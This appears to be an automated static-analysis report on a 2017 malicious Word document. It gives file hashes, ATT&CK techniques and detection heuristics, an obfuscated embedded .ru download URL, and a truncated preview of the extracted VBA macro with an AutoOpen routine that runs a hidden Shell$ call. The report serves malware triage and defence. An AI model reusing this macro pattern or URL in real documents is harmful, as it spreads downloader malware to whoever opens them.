Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b72377bee6fc45b6…

MALICIOUS

Office (OLE)

Size: 152.0 KB
Created: 2017-11-14 19:15:00
Authoring application: Microsoft Office Word
First seen: 2017-11-20
MD5: 66029e61361c15d7e710dd8ef52cff3e
SHA-1: 415d522b11e9cbb25e2d640bd60ce6b106663514
SHA-256: b72377bee6fc45b6bb7fbb7725b340b23c1393131bf85766b8ebd7d07c71cdea
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Office document containing a malicious VBA macro. The AutoOpen macro executes a Shell() command, a common technique for downloading and executing further malicious content. The obfuscated script and the presence of a suspicious URL suggest downloader or dropper functionality.

Heuristics (8)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://KM5+KM5www.1001KM5+KM5parfuKM5+KM5mz.ru/lKM5+KM5jBfKS8i+S8iM5+KM5i/,KM5+KM5htKM5+KM5tp://KM5+K (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 211698 bytes
SHA-256: ab35ab23504309c8a3a1489cce74daf88ab8352428ab0298ed968275ca693555
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 64 long base64-like blobs)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "foVjtrtuI"
Sub AutoOpen()
EUzLFYXYi = "utbXRtzqv" + "inEUSiFKP" + "AENPTAYGm" + "OcbMmvbhR"
Shell$ XrbNVPkQN, 0
sitiUnkZo = "PkCVFvJXU" + "RfZbzLHjN" + "URAJtlNNf" + "VSjZiuMIW"
End Sub
Function XrbNVPkQN()
... (truncated)